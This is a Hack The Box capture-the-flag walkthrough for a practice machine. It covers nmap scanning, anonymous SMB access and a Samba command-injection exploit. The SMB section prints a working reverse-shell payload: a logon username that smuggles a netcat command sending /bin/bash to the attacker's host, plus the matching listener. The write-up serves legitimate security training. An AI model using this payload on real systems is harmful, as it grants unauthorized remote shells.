Hey everyone!
The box is really easy it has two vulnerabilities which we can do to exploit the box without Metasploit, and we're going to do one of these vulnerabilities.
---------------------------------
If you want to do the box with no problems you need to make sure you have these three things:
1- VIP member on HTB
2- Netcat you can download it by running this command
sudo apt-get install netcat
3- smbclinet you can download it by running this command
sudo apt-get install smbclient
_____________________________________________________________________
First step, we have to make sure the box is working by using PING
Perfect!
_____________________________________________________________________
Now we should scan the machine with the best network scanner of course it's nmap
🕵🏻
I always use this command I don't know why, but it's perfect to me
😁'
nmap -sC -sV -p- -T4 -oA nmap 10.10.10.10
let's make it clear first:
nmap = The tool itself
-sC = To perform a scan with most of the default scripts, use the -sC flag or alternatively use --script=default
-sV = It's useful to know what software and what versions of that software a machine is running.
-p- = It's worth doing a complete scan of every port.
-T4 = It's for timing, These timings range from 0 through 5, with 0 being the slowest and least invasive and 5 being the fastest and most overt.
-oA nmap = It helps a lot. It will save the result to a text file its name nmap (you can change nmap to anything you want), so you can come back again to see the result without doing scan again
The Nmap Result:
After looking to the result we can see there're 5 ports are OPEN
21 PORT = FTP , I can login as anonymous.
22 PORT = SSH
139 PORT = SMB
445 PORT = SMB
3632 PORT = DISTCCD
_____________________________________________________________________
First, I checked FTP but didn't find anything.
😫
_____________________________________________________________________
Since we don't have usernames and passwords for SSH often it's really difficult to use Hydra to find them.
But if you see we have PORT 139 and 445 which are using for SMB
let's check what we can find on it.
Ohhh we have tmp which we can read and write
🤫😈
You can login with anonymous username and no password
😉
Right now we could connected with SMB with anonymous username and no password then I wrote help to see what I can do
🧐
Since logon command is there we can make reverse connection using the same
logon "/=`nc ‘attack box ip’ 4444 -e /bin/bash`"
Before make reverse we have to make sure we add a listener on our machine.
nc -lvnp 4444
I hope you learned something from this box
Thank you!
3gbCyber
